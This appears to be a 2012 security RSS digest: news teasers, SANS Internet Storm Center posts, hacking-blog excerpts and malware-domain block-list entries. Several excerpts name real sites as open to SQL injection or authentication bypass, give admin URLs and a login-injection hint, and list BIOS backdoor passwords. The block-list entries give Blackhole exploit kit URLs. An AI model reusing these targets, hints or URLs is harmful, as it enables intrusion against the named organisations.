==> Big Data Improves Services and Performance Say Business Leaders

http://www.globalsecuritymag.com/spip.php?page=backend A majority of organisations see the main benefits of Big Data as providing information to improve services and performance (56%), rather than marketing (22%), finds a survey from the UK's largest end-to-end infrastructure event, IP EXPO. The survey, which gathered the views of business leaders attending IP EXPO, also shows that nearly half of respondents (49%) are either looking into how Big Data can help their organisations, are investigating a Big Data strategy or already have one. The (...) - Opinion

==> Panda Security and Facebook Join Forces to Help Users Protect Their Digital Lives

http://www.globalsecuritymag.com/spip.php?page=backend Panda Security has signed a collaboration agreement with Facebook to protect users of the popular social networking site. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. Additionally, the security company and the social media site will share their databases of malicious URLs to protect users while surfing the Web. Panda Internet Security 2013 is specifically designed to protect users' identity while using social (...) - Business News

==> Check Point extends 21000 appliance Line with New Datacenter Security Offering

http://www.globalsecuritymag.com/spip.php?page=backend Check Point Software Technologies announced the launch of its new 21600 Appliance that provides lightning fast throughput of up to 110 Gbps, a 30 percent boost in SecurityPower units (SPUs) and ultra-low latency for transaction-oriented environments. The 21600 Appliance is a high-performance system designed to optimize a full range of Software Blade protections, providing large enterprises and data centers with industry-leading security and performance. Modern security gateways go beyond (...) - Product Reviews

==> Active Circle chosen by Avid Italy for providing archiving solutions integrated in the Avid media workflow

http://www.globalsecuritymag.com/spip.php?page=backend Active Circle, global provider of storage and archive management solutions for digital content, and Avid Italy, system integrator and distributor of the Avid brand in Italy, are announcing a partnership under which Avid Italy will integrate and sell Active Circle solutions to media customers in Italy. Avid Italy Srl is now an Active Circle VAR (Value Added Reseller) with the required technical expertise to install and to support storage and archive solutions based on the Active Circle (...) - Market News

==> Five top spam texts for 2012 revealed in AdaptiveMobile's Ongoing Threat Analysis

http://www.globalsecuritymag.com/spip.php?page=backend AdaptiveMobile, the world leader in mobile security, today announces five SMS spam campaigns that are plaguing UK mobile phone users in 2012. Text messages offering thousands of pounds to consumers because of mis-sold Payment Protection Insurance scored the highest on AdaptiveMobile's Ongoing Threat Analysis (OTA) which rates the impact of spam text messages by sector. The report highlights the need for operators to continue to focus on keeping the SMS channel clean to protect users from (...) - Malware Update

==> Vigil@nce - Ruby: modify a variable despite SAFE 4

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY When a Ruby application allows an external code to be executed in SAFE 4 mode, it can use Exception or NameError, in order to modify a variable of the application. Impacted products: Fedora, Unix (platform) Severity: 2/4 Creation date: 03/10/2012 DESCRIPTION OF THE VULNERABILITY The security level "$SAFE = 4" limits features that the Ruby code is allowed to use. For (...) - Security Vulnerability

==> Skyscape Cloud Services Takes EMC Documentum To The Cloud

http://www.globalsecuritymag.com/spip.php?page=backend Skyscape Cloud Services Limited, the easy to adopt, easy to use and easy to leave Assured Cloud Services Company, today announced that it will be providing EMC Documentum to its UK Public Sector clients as part of its Software-as-a-Service portfolio. Other products from the EMC Information Intelligence Group will also be made available. This agreement will allow Skyscape to supply a wide range of Cloud Services based upon EMCs extensive software portfolio to the UK Public Sector who will (...) - Business News

==> Vigil@nce - Wireshark 1.8: four vulnerabilities

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY Several vulnerabilities of Wireshark can be used by a remote attacker to create a denial of service or to execute code. Impacted products: openSUSE, Wireshark Severity: 2/4 Creation date: 03/10/2012 DESCRIPTION OF THE VULNERABILITY The Wireshark program captures and displays network packets. Protocols are decoded by dissectors. They are impacted by several (...) - Security Vulnerability

==> Workplace IT: ENISA sees opportunities and risks in “Bring Your Own Device” trend

http://www.globalsecuritymag.com/spip.php?page=backend The developing trend of people using their own computers, phones, social networks or smart devices and applications for work offers benefits, but also brings risks. That's the message from the European Network and Information Security Agency (ENISA) in its latest report, Consumerisation of IT: Top Risks and Opportunities. In today's high-pressure work environment, mobility and networked knowledge are two key factors shaping the future of professional life. These factors, combined with the (...) - Special Reports / affiche

==> APWG Report: Brands Targeted by Cybercrime Gangs Reach All-Time High in April

http://www.globalsecuritymag.com/spip.php?page=backend The APWG reports in its Q2 2012 Phishing Activity Trends Report released this week that the number of brands targeting by phishing attacks sustained an all-time high of 428 in April of this year, the second record-breaking quarter for cybercrime brand abuse reported by the APWG this year. Reports received by the APWG during Q2 2012 indicate new record highs in the numbers of attacks on identifiable brands and in the numbers of phishing websites to lure Web users. The APWG reports that (...) - Malware Update / affiche

==> Only 7 weeks to go before Cyber Security Forum Asia

http://www.globalsecuritymag.com/spip.php?page=backend In seven weeks' time, on December 3-5 Cyber Security Forum Asia: A Threat to Critical National Infrastructure will open. The conference and exhibition will bring together experts, end users, policymakers, industry, and procurement staff. The Conference The conference will feature high level speakers from organizations including the Australian Government, Kaspersky Lab, The Japanese Asia-Pacific Cyberlaw, Cybercrime and Internet Security Institute, Cloud Security Alliance, CyberSecurity (...) - Business News

==> Milipol Qatar 2012 boasts record participation at region's premier security show

http://www.globalsecuritymag.com/spip.php?page=backend the region's most influential trade exhibition dedicated to internal State security wrapped up three days of showcasing the state-of-the-art in security products and services from hundreds of international exhibitors. The Doha Exhibition Centre was the venue for the ninth edition of the biannual event which ran from October 8 to 10, organised jointly by Qatar's Ministry of Interior and the France-based security event experts Milipol. The exhibition was inaugurated by H.E. Minister of (...) - Business News

==> Cyber Security Awareness Mont - Day 19: Standard log formats and CEE., (Fri, Oct 19th)

http://isc.sans.org/rssfeed_full.xml Back when I started DShield.org, one of the challenges was dealing with variations in log formats. 10+ years laters, this problem hasn't really changed, even though there are some promising solutions (which isn't that different form 10+ years ago). Firewall logs are a pretty simple example. The basic information captured is pretty similar across different firewalls: Packet header data. Some log formats are more verbose then others, but the idea is the same and it is not too hard to come up with a standard to express these logs. For DShield, we used a smallest common denominator approach. It wasn't our goal to collect all the details offered by different firewalls. For an enterprise log management system however, you may need to preserve this detail, and the simple tab delimited format we came up with for DShield wouldn't be extensible enough. One of the logging standards that is gaining some steam is CEE, or Common Event Expression [1]. To be successful, a logging standard has to address a number of different problems: Log format: This is the basic syntax used to express logs. This problem is actually the easier one to solve, and the current approach is to use XML to express the logs. XML isn't exactly efficient, but it is extendable and there is a rich set of libraries and database technologies to create and parse XML. I see it as the ugly default solution. A more compact binary format may be preferred, but would have a much higher cost to get started. Taxonomy: This is the hard problem. The magic strings we assign different events. For firewall logs, this is pretty easy usually. But think about antivirus! You could log the MD5 hash of the sample that was detected as malicious. But this wouldn't be as meaningful as knowing what malware family this sample belongs to. But there is no agreement as to what constitutes a malware family or what to call different families. If you have to correlate logs from different vendors, you will need to translate the name each vendor assigns to a particular piece of malware. Vendor Acceptance: There are a lot of great proposals in this space that solve the first two problems. But unless you want to implement it yourself, you need a vendor to support a particular solution. In order for a standard to catch on, there has to be customer demand first. Secondly, the solution has to be economical to implement. It helps if the standard is open and not associated with licensing fees. But first of all, the standard needs to be easy to implement. So how does CEE solve these issues? Log Format CEE supports two different formats: XML and JSON. XML is the primary standard allowing for the most flexibility, but JSON, due to its simple structure, is easier to parse and sufficient in many applications. It is also not terribly hard to convert JSON to XML. Taxonomy/Vocabulary CEE doesn't really solve all of this problem, but it starts by defining common labels and data types (like src.ipv4 for the IPv4 address of a source). In part, CEE refers to other standards like CVE to come up with a vocabulary to use to identify events. Log Transport I didn't list this problem above, but it is certainly important to consider how logs are transported. In the Unix world, various versions of syslog have become the de-facto standard for log transport. But once you leave Unix based systems, syslog support is no longer a given. CEE addresses various issues like support for compression and protecting log integrity (which plain old syslog doesn't do well at all) I do think CEE is certainly a standard to watch out for. Right now, the standard is labeled as beta. The tricky part will be vendor support. The CEE board does include representatives from a number of important vendors, but I don't see a lot (any?) log management vendors on the list. Of course CEE would help the most if devices generating logs would support it. [1]http://cee.mitre.org /** Learn more about log management during my class at CDI in Washington DC (Dec 15/16) */ -- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Friday, October 19th 2012 http://isc.sans.edu/podcastdetail.html?id=2884, (Fri, Oct 19th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Another Java update! Java SE 1.6.0_37 Available ==> http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html, (Thu, Oct 18th)

http://isc.sans.org/rssfeed_full.xml =============== Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Thursday, October 18th 2012 http://isc.sans.edu/podcastdetail.html?id=2881, (Thu, Oct 18th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Cyber Security Awareness Month - Day 17 - A Standard for Risk Management - ISO 27005, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml A word that I'm hearing a lot these days from clients is Risk. And yes, it has a capital R. Every time. Folks tend to think of any risk as unacceptable to the business. Every change control form now-a-days has a Risk Assessment and Risk Remediation sections, and any issue that crops up that wasn't anticipated now becomes a process failure that needs to be addressed. Don't get me wrong, I'm all for some rigor in Risk Assessment, but every risk can't be an 11 on a scale of 1 to 10. Enter ISO/IEC 27005:2011 - Information technology - Security techniques - Information security risk management. ISO 27005 allows system administrators (change requestors) and managers (change approvers) to use a common approach, the same language and come to an agreement on risk. Most importantly, this helps parties like this come to an agreement quickly if youve ever had a change approver who has trouble saying either yes or no, youll understand why this is so important. This standard starts by defining a framework and a flowchart to manage risk (below). Like all good methodologies, theres decision points and iteration, so youll need to ensure that you identify decision makers who will actually decide, or youll never escape! Once inside the flowchart, I found that I was impressed with the emphasis on business and organizational language this standard is written to get buy-in from management (this is a good thing). Theyve also got the obligatory section on qualitative and quantitative risk, but more importantly, in the appendices there is some clear direction on how to use both approaches. More importantly (in my books anyway), they have examples of taking a qualitative assessment and quantifying it, allowing you to apply numeric values to fuzzy situations. This makes the job of the System Administrator easier when proposing a change, you can use this approach to assign actual values to things, The Risk Treatment section ensures that a final decision is made. Too often we see managers decide not to decide following this standard ensures that everyone understands that this is not an option - there are a few choices to make, and yes, assuming the risk is a valid choice. When all the ducks are lined up and its decision time, then a decision there will be! I cant cover every aspect of a 68 page standard in 1 page, but suffice to say that this one is well worth the purchase price yes, its an ISO standard so youll have to buy it to use it. If you've got a risk managementwar story, or a comment on this post, please use our comment form, we'd love to hear from your! In SANS SEC579, we use the ISO 27005 methodology and apply it to the ENISA Cloud Risk document (see references below) to contrast the risks of Public and Private Cloud deployments to your organization. References: (2011). ISO/IEC 27005 - Information technology - Security techniques - Information security risk management (ISO/IEC 27005:2011). Geneva, Switzerland: International Standards Organization (2009). Cloud Computing: Benefits, risks and recommendations for information security. Crete, Greece: ENISA - European Network and Information Security Agency. =============== Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Time to update - Java version 7 update 9 (JRE 7u9, JDK 7u9) is out! Release notes here - http://www.oracle.com/technetwork/java/javase/7u9-relnotes-1863279.html, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml =============== Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> New Acrobat release (including reader) available. Version 11. Some security improvements more here -->http://blogs.adobe.com/adobereader/, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Wednesday, October 17th 2012 http://isc.sans.edu/podcastdetail.html?id=2878, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Oracle Critical Patch Update October, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml Oracle has just released their critical patch update http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html Quite a number of products are being patched also for those of you subject to PCIDSS there are a significant number of patches addressing issues with a CVSS score of 4 or higher, which must be patched under the standard. They have also released a critical patch update for Java http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html The info in the Oracle bulletin is comprehensive and should allow you to identify what needs to be done fairly easily. Both bulletins have the following wording in the work around section Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. For most of us not new (at least not on the java side), but maybe a strong argument if you get pushback on patching. Happy patching, as always test before you implement. Mark H - shearwater (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> BSNL- Dotsoft (Admin) Auth Bypass Vulnerability, calcuttatelephones.com Database Disclosure

http://www.thehackerslibrary.com/?feed=rss Profile: Dotsoft is an in-house developed software, integrating the Commercial Activities, Telecom Billing & Accounting,FRS and Directory Enquiry. It has been implemented in171 SSAs (Districts) across the country. Company URL: http://dotsoft.bsnl.co.in/ Admin url: http://dotsoft.bsnl.co.in/helpdesk/admin.asp Demo: http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream Calcuttatelephones.com Database Disclosure, Directory Listing. http://www.calcuttatelephones.com Demo: http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream Database containing 2600 plus records. phpMyAdmin SQL Dump version 2.5.7-pl1 [...]

==> Unlock Idea Net Setter – The Easiest Way

http://www.thehackerslibrary.com/?feed=rss In india IDEA launched his Netsetter USB 3G modem for internet accesss You can access upto 21mbps via this USB Net setter As I was watching people here fool others in the name of unlocking To earn money So I thought why not I educate our members Netsetter is using a Hawai [...]

==> IGNOU website+Few other Sites – SQL Injection, Weak Authentication Vulnerabilities

http://www.thehackerslibrary.com/?feed=rss IGNOU currently serves approximately 3.8 million students in India and 40 countries abroad in twenty one schools and a network of 59 regional centres, 7 sub-regional centres, 2600 study centres, and 52 overseas centres. IGNOU website is somehow vulnerable to SQL Injection & Weak Authentication Vulnerability. Some modules of site www.ignou.ac.in have weak authentication, [...]

==> vsworld.com – SQL Injection Vulnerability

http://www.thehackerslibrary.com/?feed=rss vsworld – SQL Injection Vulnerability Profile: Developing solutions for areas as diverse as technology, trading, power, travel, education and retail. In addition, regularly called upon to cater to the requirements of prestigious Government Bodies. Various prestigious clients are in Client list. Vendor URL:http://www.vsworld.com/index.php Vulnerability Type : SQL Injection Vulnerable URL: http://www.vsworld.com/index.php/en/admin-login.html & http://www.vsworld.com/index.php =>VSM Login [...]

==> Sandeep’s Commentry on the Linux Kernel – Part 1

http://www.thehackerslibrary.com/?feed=rss I will provide a hands on guide on dissecting and learning the Linux kernel . But I am busy with work and so forth and It may not be able to post in regular way. I however will not spoon feed and I will just be providing general guidelines. Also I will covering the linux [...]

==> Bom Sabado – A new orkut worm

http://www.thehackerslibrary.com/?feed=rss Bom Sabado means in english happy saturday it is a worm spreaded by some brazilian group in this article i m going to share its working process and how to prevent from it hope u enjoy the article In this attack , u get some scrap saying bom sabado and your account hanged you joined [...]

==> Orkut Bug: Community Hacking

http://www.thehackerslibrary.com/?feed=rss There was a bug few days ago in new orkut Some of big community like Stanford was hacked back then So here is the post how it was hacked The attacker transfers a dummy community to himself Then he start capturing what data proceed during the transfer By this attacker uses a Firefox addon called [...]

==> SSL Hijacking

http://www.thehackerslibrary.com/?feed=rss It discusses the weakness in the SSL certificate signing request which gets exploited for making fake certificates. Finally, the article shows how to run the SSLStrip tool on Windows and hijack the SSL successfully. What is SSLStrip The SSLStrip works by watching http traffic, then by acting as a proxy when a user attempts to [...]

==> Sikkim Manipal University portal can be hacked via SQL Injection

http://www.thehackerslibrary.com/?feed=rss About the university: Sikkim Manipal is one of the largest private University in India. The Institute attracts students from all over the country, with over 1700 students enrolled in the various engineering disciplines. 102 full-time faculties are employed. Type of problem: SQL Injection Vulnerable Portal: http://portal.smude.edu.in/ User Name: sanjay any name will Password: ‘ [...]

==> Future is Open Source…………………..NOT !

http://www.thehackerslibrary.com/?feed=rss We are hearing this things from years that open source is the future of the world ,everything will be open source in future but i dont think it is possible in a logical way ,i know i sound very strange and against the majority but i know whatever point and example i am going to [...]

==> Heap Overflows: Ancient Art of Unlink Seduction

http://www.thehackerslibrary.com/?feed=rss Hi, Here’s an article which introduces the earlier techniques of Heap Overflows. I find that it is almost mandatory to understand these basic, albeit useful, techniques. Dynamic Memory Allocation and the Heap The data associated with a program in memory can be allocated to one of 3 areas: (a) The data segment for global data, [...]

==> Cracking Router Password

http://www.thehackerslibrary.com/?feed=rss In this tutorial we will use brutus but you can use any brute forcer So download brutus from below link http://www.hoobie.net/brutus/brutus-download.html step 1- when we try to access our router it will ask for id and password ,we can use some of the default id password like admin:admin,admin:12345 etc etc ………….. step 2 – now [...]

==> Google Hacking Part 2

http://www.thehackerslibrary.com/?feed=rss As in the first part arbu posted about the basic of google hacking in this part i m just going to put some of the basic important google dork only that a hacker used. This article is only for educational purpose so if any one misuse it that will not be my responsibility or this [...]

==> Code Classics

http://www.thehackerslibrary.com/?feed=rss An few anecdotes about code snippets that range from the craziest to the most elegant Cryptic quote by Kawigi 1 double m[]= {7709179928849219.0, 771};int main(){m[1]--?m[0]*=2,main():printf(m);} This cryptic code when run outputs “C++ sucks” A Quine is a computer program which produces a copy of its own source code as its only output. 1 main() { [...]

==> ARP Poisoning -ARP Spoofing :Info And Defense

http://www.thehackerslibrary.com/?feed=rss Article Taken from : Sean Whalen (http://www.rootsecure.net/content/downloads/pdf/arp_spoofing_intro.pdf) This article is for educational purpose only if someone misuse the information then author or site admin is not responsible for it Introduction A computer connected to an IP/Ethernet LAN has two addresses. One is the address of the network card, called the MAC address. The MAC, in [...]

==> Cross Website Scripting(XSS) Info and Prevention

http://www.thehackerslibrary.com/?feed=rss So here I m gonna write an article over XSS aka cross website scripting Some declaration-this article is only meant for educational purpose if someone uses it for wrong purpose then THL is not responsible for it . Note since THL will not going to show the codes so I modify then now [...]

==> Restoring lost partitions using Ubuntu live CD

http://www.thehackerslibrary.com/?feed=rss FAQ: How do I restore my lost partition table? I accidentally deleted my partition table, how do I recover my data? How to recover deleted partitions and data in them? Recover data from deleted drives. WARNING: If you’ve formatted and/or added new data to the drive, or carried on with an OS installation, chances of [...]

==> DDoS Attacks and DDoS Defense Mechanisms

http://www.thehackerslibrary.com/?feed=rss Introduction Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks.The DDoS field is evolving quickly, and it is becoming increasingly hard [...]

==> Unable To See Hidden Files

http://www.thehackerslibrary.com/?feed=rss We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’. It happens due to a small bug/virus which [...]

==> Practical Compiler Development Part 1

http://www.thehackerslibrary.com/?feed=rss Practical Compiler Development Tutorial Part 1 This is a rather informal introduction to development of a hobby compiler . The more formal chapters on compiler development will be given in later tutorials. By the end of this tutorial you will be able to create a simple interpreter . This can be easily converted into [...]

==> Dynamic DLL Injection

http://www.thehackerslibrary.com/?feed=rss As in my previous post I describe about the static dll injection Now we will look at the dynamic dll injection. which is mostly used by Trojans. After a program has been executed, a process is created in the OS. When an attacker attempts to load code into the process memory space, then the attacker [...]

==> Quantum Computing the new Horizon in Computing History

http://www.thehackerslibrary.com/?feed=rss The massive amount of processing power generated by computer manufacturers has not yet been able to quench our thirst for speed and computing capacity. In 1947, American computer engineer Howard Aiken said that just six electronic digital computers would satisfy the computing needs of the United States. Others have made similar errant predictions about the [...]

==> Semantic E-mail Delivery: The Future of E-mail?

http://www.thehackerslibrary.com/?feed=rss Smart email figures out who should get messages. new cutting edge technology? or just another waste of time? Perhaps you might discover a life-changing potential so stay tuned. A prototype e-mail system being tested at Stanford University later this year will radically change how users specify where their messages are supposed to be delivered. [...]

==> Spyware – A Threat To Your Privacy:Info and Defence

http://www.thehackerslibrary.com/?feed=rss What is spyware ? Spyware is Internet jargon for Advertising Supported software (Adware). It is a way for shareware authors to make money from a product, other than by selling it to the users. technically it is a software which spies on you it spy over your music habits(just like google is spying on your [...]

==> Buffer Over Flow Attack

http://www.thehackerslibrary.com/?feed=rss If you are reading this post then you definitely have some idea about computer programming and process, A computer program executes various processes and goes on balancing equations for which it has been created. In the new era of programming we generally see that companies recruit only those programmers which are efficient in programming. Now [...]

==> CAIN and ABEL Tutorial 4

http://www.thehackerslibrary.com/?feed=rss This will contain Network Enumerator Promiscuous-mode scanner Sniffer SQL Server 2000 Password Extractor Traceroute Network Enumerator The Network Enumerator uses the native Windows network management functions (Net*) to discover what is present on the network. It allows a quick identification of Domain Controllers, SQL Servers, Printer Servers, Remote Access Dial-In Servers, Novell Servers, Apple File [...]

==> Hotlinking and Bandwidth Theft

http://www.thehackerslibrary.com/?feed=rss The internet is going at a pretty fast pace. We can also find bloggers, webmasters and website developers among ourselves these days. This is an important reason for me to write this post. Before proceeding let me give a small introduction about what actually I have posted here. Introduction Bandwidth theft does not mean cracking [...]

==> CAIN and ABEL Tutorial 3

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will contain Certificates Collector Cisco Config Downloader/Uploader Mac Scanner Certificates Collector Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake [...]

==> CAIN and ABEL Tutorial 2

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will cover: ARP Poison Routing APR-HTTPS APR APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an [...]

==> CAIN and ABEL Tutorial 1

http://www.thehackerslibrary.com/?feed=rss This tutorial will cover (version 4.9.8) INTRODUCTION Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you cant very well hack a network if you take [...]

==> The PE Format

http://www.thehackerslibrary.com/?feed=rss Warning: This document is contains purely technical information. This can be considered as iron, out of which weapons can be made . Additionally, this is about 48 pages long and written by me Introduction: Windows uses the Portable Executable Format to store executable files, also known as an “image” of an executable. Although the PE [...]

==> BandWidth Explained

http://www.thehackerslibrary.com/?feed=rss BandWidth Explained Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company [...]

==> GMAIL Search Query

http://www.thehackerslibrary.com/?feed=rss Gmail Search Syntax Gmail offers a rich search syntax for routing through your email message travel through the headers of your email message archive in search of mail sent by someone matching the keyword you provide: from:arbabusmani@gmail.com finds all messages sent to someone matching a provided keyword. (Don’t forget plus-addressing) to:usmani.arbab@yahoo.com to:hacking+books@gmail.com Match messages with [...]

==> Intrusion Detection Systems [IDS]

http://www.thehackerslibrary.com/?feed=rss An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator in case it detects some intrusion attempt from an external source into a private network. In some cases the IDS may also respond to anomalous or malicious traffic [...]

==> Google Hacking

http://www.thehackerslibrary.com/?feed=rss Use Google as a warez search engine a.k.a Get Free Stuff! 1.Go to www.google.com 2.In the Search Bar type in:“intitle:index of” and then type in the keyword for whatever you are looking for. So for example if I want to find some linkin park songs I would type in this: “intitle:index of” LINKINK PARK(OR SONG [...]

==> Gmail Themes are here!!!

http://www.thehackerslibrary.com/?feed=rss Hi All, The Themes for GMAIL are here. Though there is no official word from Google or Gmail team in the google blog yet, few people across the globe saw there gmail with themes and a new tab saying themes in the settings page. The settings page can be reached athttp://mail.google.com/mail/#settings/themes and for gohttp://mail.google.com/support/bin/answer.py?hl=en&ctx=mail&answer=112508 for [...]

==> Practical Hashing

http://www.thehackerslibrary.com/?feed=rss This is my first blog here and this will be about cryptographic hash functions. I have chosen this as the topic for my first post as hashing functions are very common in the field of cryptography, which is an area of interest of mine. A hash function takes a string of bits or bytes as [...]

==> Some linux commands

http://www.thehackerslibrary.com/?feed=rss Starting & Stopping shutdown -h now Shutdown the system now and do not reboot halt Stop all processes – same as above shutdown -r 5 Shutdown the system in 5 minutes and reboot shutdown -r now Shutdown the system now and reboot reboot Stop all processes and then reboot – same as above startx Start [...]

==> GUI Toolkits compared

http://www.thehackerslibrary.com/?feed=rss GUI Toolkits Compared I have worked with few UI libraries during my college days (late night hackwork !). Although It has months since i really coded something in C/C++ . Here is my opinion on most of the UI frameworks ( choices available ) . (a) Win32 API , GDI (user32.dll) This was the [...]

==> The New Era of Eavesdropping

http://www.thehackerslibrary.com/?feed=rss You all must have heard about Keyloggers. You can log the keystrokes using keyloggers working as a hidden background service at victim’s computer. Just imagine a case, you think your system is secured as its not having any keylogger and you’ve thoroughly scanned the background service and there is no suspicious service running behind as [...]

==> DNA Computing

http://www.thehackerslibrary.com/?feed=rss Silicon has been successful for years as computing materials. Almost every computer in the world has silicon in it. Probably we cant imagine a computer without silicon. So what is special in it? The answer lies in its structure what makes it a very special material for computer. But that is not our concern here. [...]

==> Port Scanning

http://www.thehackerslibrary.com/?feed=rss Port Scanning: Port scanning is the process of connecting to TCP and UDP ports on a target system to determined what services are running or in a LISTENING state. Identifying listening ports is critical to determine the type of operating system and applications in use. Active services that are listening may allow an unauthorized user [...]

==> BIOS Password Hack

http://www.thehackerslibrary.com/?feed=rss Standard BIOS backdoor passwords The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, [...]

==> Resetting Root Authorization in Linux and Prevention

http://www.thehackerslibrary.com/?feed=rss The root authentications can be reset to NULL value from the following method. Do not use this information for committing cyber crimes. AT Grub Loader. highlight the desired kernel which you want to boot ‘fedora core fc9′ press ‘e’ to edit the run levels and other options then the second menu arrives as .. (hd0,1) [...]

==> Firefox v/s Chrome

http://www.thehackerslibrary.com/?feed=rss * Post Updated, Must Read * Google Chromes release makes a big dust in the internet world. Mozilla is feeling big pressure about that. However, Mozilla has not hit the panic button yet, because they released a number of benchmarks showing Firefox 3.1 will be faster than anything Google can muster with Chrome. Google claims [...]

==> How to Bypass Mandatory Free Registrations

http://www.thehackerslibrary.com/?feed=rss Do you really get annoyed when asked for FREE REGISTRATIONS by many websites without which you cannot proceed further? Everyone who uses internet regularly must have faced this and must be knowing how annoying this is. Registering means, you have to give your personal details, which can result in SPAM, Promotion emails, Identity Theft etc. [...]

==> leprasmotra.ru:8080 (2012/10/18_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: leprasmotra.ru:8080/forum/links/column.php, IP address: 72.18.203.140, ASN: 26277, Country: US, Description: Blackhole exploit kit 2.0

==> img.greaterlife.us (2012/10/18_16:30)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: img.greaterlife.us/links/demands-lower.php, IP address: 93.170.128.219, ASN: 57494, Country: CZ, Description: Blackhole exploit kit 2.0

==> 199.71.212.114 (2012/10/18_16:30)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 199.71.212.114/links//term_covering.php, ASN: 40676, Country: US, Description: Blackhole exploit kit 2.0

==> qroyooa.toh.info (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: qroyooa.toh.info/links/fancy_wherever_divided.php, IP address: 91.121.139.49, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0

==> widewayinc.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: widewayinc.com/Web/replacement-based_destroy-varies.php, IP address: 149.47.156.172, ASN: 36444, Country: US, Description: Blackhole exploit kit 2.0

==> sdbi.my03.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: sdbi.my03.com/external/expression-games-affected.php, IP address: 188.165.95.15, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0

==> bigfatcowboy.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: bigfatcowboy.com/links/term_covering.php, IP address: 173.246.100.236, ASN: 29169, Country: US, Description: Blackhole exploit kit 2.0

==> 74.91.121.247 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 74.91.121.247/links/assure_numb_engineers.php, ASN: 14745, Country: US, Description: Blackhole exploit kit 2.0

==> 129.121.130.156 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 129.121.130.156/Url/links/deemed_registers.php, ASN: 36444, Country: US, Description: Blackhole exploit kit 2.0

==> kennedyana.ru:8080 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: kennedyana.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> hotsecrete.net (2012/10/16_16:08)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: hotsecrete.net/detects/exclude-offices_details_warm.php, IP address: 183.81.133.121, ASN: 38442, Country: FJ, Description: Blackhole exploit kit 2.0

==> bakface.ru:8080 (2012/10/16_16:17)

